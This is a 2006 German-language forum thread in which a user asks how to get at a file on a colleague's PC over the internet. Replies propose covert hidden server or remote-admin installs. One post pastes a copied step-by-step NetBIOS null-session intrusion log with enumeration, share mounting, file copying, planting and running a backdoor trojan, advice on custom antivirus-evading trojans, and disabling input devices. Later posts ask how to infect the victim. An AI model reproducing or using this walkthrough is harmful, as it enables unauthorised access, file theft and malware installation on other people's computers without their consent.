#1 11. Februar 2006 Hallo leute, also ein kollege hat auf seinem desktop einen ordner, ein textdokument, gibt es eine möglichkeit übers internet auf diese textdatei zuzugreifen ? würd mich über hilfe freuen + Multi-Zitat Zitieren
#2 11. Februar 2006 1.) ftp (filezilla ftp server) 2.) smb shares (wind00f^) 3.) webserver (apache) => tut hier mfg moep + Multi-Zitat Zitieren
#3 12. Februar 2006 Ich denke, er möchte das ohne das Wissen seines Freundes tun also: 4.) NetBios MfG NecrOX + Multi-Zitat Zitieren
#4 12. Februar 2006 1.) nein.... smb shares = netbios... 2.) kann er doch nen apache oder so hidden installen 3.) nen ftp auch 4.) radmin mfg moep + Multi-Zitat Zitieren
#5 12. Februar 2006 musser ja erstmal an diesen pc...ich glaube nicht,dass er den pc hacken kann,sonst würde ers net fragen da kanner gleich die txt datei an seinen pc schieben + Multi-Zitat Zitieren
#7 12. Februar 2006 Sowas wie MSSQL oder Oracle,für 1337 hacker halt Tuts findeste hier aufm board glaub ich sogar welche! + Multi-Zitat Zitieren
#8 12. Februar 2006 1. Breaking NETBIOS: ************************** C:\>nbtstat -A xxx.153.41.207 LAN-Verbindung: Knoten-IP-Adresse: [192.167.0.31] Bereichskennung: [] NetBIOS-Namentabelle des Remotecomputers Name Typ Status --------------------------------------------- Y <00> UNIQUE Registriert Y <20> UNIQUE Registriert <--- Shared Folders DOMÄNE <00> GROUP Registriert DOMÄNE <1C> GROUP Registriert DOMÄNE <1B> UNIQUE Registriert DOMÄNE <1E> GROUP Registriert Y <03> UNIQUE Registriert <--- and diesen PC kann man messages senden ADMINISTRATOR <03> UNIQUE Registriert <--- and diesen PC kann man messages senden (net send /PCname oder IP message) DOMÄNE <1D> UNIQUE Registriert ..__MSBROWSE__. <01> GROUP Registriert Y <6A> UNIQUE Registriert Y <87> UNIQUE Registriert MAC Adresse = 00-50-04-11-A2-D6 c:\>net view \\xxx.153.41.207 Systemfehler 5 aufgetreten. Zugriff verweigert. c:\> ---> uups ... heh kein problem wir finden trotzdem raus welche datein/verzeichnisse ---> freigegeben sind. durch eine NETBIOS null session. c:\> net use \\xxx.153.41.207\ipc$ "" /user:"" <---- es gibt noch einige andere null session möglichkeiten Der Befehl wurde erfolgreich ausgeführt. ---> Yeah ... nun nochmal c:\>net view \\xxx.153.41.207 Freigegebene Ressourcen auf xxx.153.41.207 NAME TYP Lokal Beschreibung ---------------------------------------------------- 37331 Platte E Platte Netlogon Platte Ressource für Anmeldeserver wwwroot Platte Eigene Datei Platte Der Befehl wurde erfolgreich ausgeführt. c:\> tja nun wissen wir welche Verzeichnisse Freigegeben sind. sollte es sich um eine Win98 maschine handeln können wir ohne probleme, falls die Ordner noch seperat mit einem pw geschützt sind, mit dem Tool pqwak das passwort durch einen bug in der authentifizierung des Netbios protokolls herausfinden. Bei WINNT/2k maschienen müssen wir leider auf die alte bewährte BFH methode zurückgreifen. Wobei es mehrere tools dazu gibt!!! ansonsten sollten wir versuchen eine Freigabe zu finden die nicht zusätzlich geschützt ist. c:\>net view \\xxx.153.41.207\37331 Systemfehler 5 aufgetreten. Zugriff verweigert. ----> tja shit, war wohl nix c:\>net view \\xxx.153.41.207\Eigene Datei Systemfehler 123 aufgetreten. Die Syntax für den Dateiname, Verzeichnisnamen oder die Datenträgerbezeichnung ist falsch. ----> na egal wehn störts? wir haben jetz ein offenes verzeichnis. c:\> ----> nun verbinden wir uns zum verzeichnis Eigene Dateien ----> wobei s: für die Netzlaufwerk verbindung steht. c:\> net use s: \\xxx.153.41.207\Eigene Datei Der Befehl wurde erfolgreich ausgeführt ---> als nächstes wechseln wir auf festplatte s: c:\> S: s:\> dir Datenträge in Laufwerk S: hat keine Bezeichnung Datenträgernummer: abuse-37331 Verzeichnis von S:\ 23.06.2001 00:25 <DIR> . 23.06.2001 00:25 <DIR> .. 23.07.2001 18:15 192.883 hVCP071.zip 1 Datei(en) 192.883 Bytes 2 Verzeichnis(se), 7.376.891.904 Bytes frei s:\> ---> tja eigentlich nichts interresanntes aber wir schauen uns mal die datei hVCP071.zip an. ---> wir kopieren Sie einfach auf unsere HD s:\> copy *.* c:\NetbiosHAck\ 1 Datei(en) kopiert. s:\> ---> so nun können wir einen trojaner hinaufladen der uns den rest des PC's freigibt ---> es ist zu empfehlen einen eignen kleinen trojan der die laufwerke, dirs, und files anzeigen, ---> ausführen, hinauf-, hinunterladen und löschen etc. kann kann, zu programmieren ---> da vorhandene trojans (wie BO2k, DeepThroat, etc..) von jedem antivirus tool erkannt werden. s:\> copy c:\backdoor\backdoor.exe s:\ 1 Datei(en) kopiert. s:\> backdoor.exe ---> nun ist das backdoor installiert und wir können uns durch den trojaner verbinden. ---> somit haben wir zugriff zum rest des systems, einzig und allein firewalls können uns noch zu schaffen machen. ---> aber das ist ein anderes Thema und interresiert uns jetzt auch nicht. Das beste ist, wenn man einen ---> Dll trojan durch die backdoor.exe einschleust. welcher eine System DLL ersezt. Wie zum Beispiel der den ich hier ange ---> fügt habe. Einfach so modifizieren das er (bei unserem Beispiel) die ausgabe nach Eigene Datein schreibt, denn da haben wir zugang. ---> nun können wir noch ein reboot erzwingen, und zwar auf einen gemeine art s:\>rundll32.exe mouse, disabled s:\>rundll32.exe keyboard, disabled s:\>c: ---> tja nun muss man wohl ein reset machen *ggg*, und wir trennen uns vorerst mal von laufwerk s c:\>net use s: /DELETE s: wurde erfolgreich gelöscht c:\> ---> voila, perfekt H4ck nur blicke ich hier nicht durch! gibts das nciht ein bisschen besser erklärt? + Multi-Zitat Zitieren
#9 12. Februar 2006 Voll der mega hacker ^^ Welche IP muss man denn haben die IP seines Providers oder die des Routers/Computers? Sorry wenn das jetzt eine dumme frage is aber ich kenn mich da nicht so aus ^^ + Multi-Zitat Zitieren
#11 12. Februar 2006 Hey Firetool du bist ja mal ein übelster Pro wenn das wirklich funzen sollte dann fätt respect und alle sollten angst vor dir haben!! aber wenn das wirklich funzen sollte dann würde sich das glaub ich ziemlich schnell rumsprechen und die Pros der grossen Firmen wüssten es dann sowieso!! Damit liesse sich ja dann vieles kontrollieren! Und das würde dann fätt gegen so manche datenschutz gestze verstossen!! naja ich weiss nich aber ich glaub nicht dass sowas überhaupt funzt ohne auf den anderen PC irgendwie manipuliert zu haben!! greez + Multi-Zitat Zitieren
#12 12. Februar 2006 Junge, wieso sollte er Pro sein Oo das ganze funktioniert nur, wenn der Typ auch die Daten freigegeben hat! und ich denke nicht das er ohne Grund seinen Desktop freigibt.. Das ist auch kein Hacken oder so, das ist nur die Ausnutzung eines Fehlers, den der Gegenüber ggf. macht, wobei die Chance dabei sehr gering ist! + Multi-Zitat Zitieren
#13 12. Februar 2006 um eins klar zu stellen. ich habe lediglich 70-80% von dem kapiert was da steht. ich habe das nicht geschrieben! ich habe es bloß aus einem anderen tutorial kopiert^^ sorry bin kein pro. wollte eben nur wissen wie man auf freigaben anderer pc´s mithilfe der ip zugreifen kann + Multi-Zitat Zitieren
#14 15. Februar 2006 hi all wennich s:>böaböaböa.exe ausfüher führt er es bei MIR aus .sprich ich würd mich infizieren! wie kann ich es denn bei IHM ausführen..will ja IHN infizieren!! danke + Multi-Zitat Zitieren
#15 15. Februar 2006 ich denke mal dass du NUR exen im freigegbenen ordner ausführen kannst. und dann auch nur auf deinem rechner. probier doch mal im lan eine exe zu starten die auf einem anderen pc liegt. + Multi-Zitat Zitieren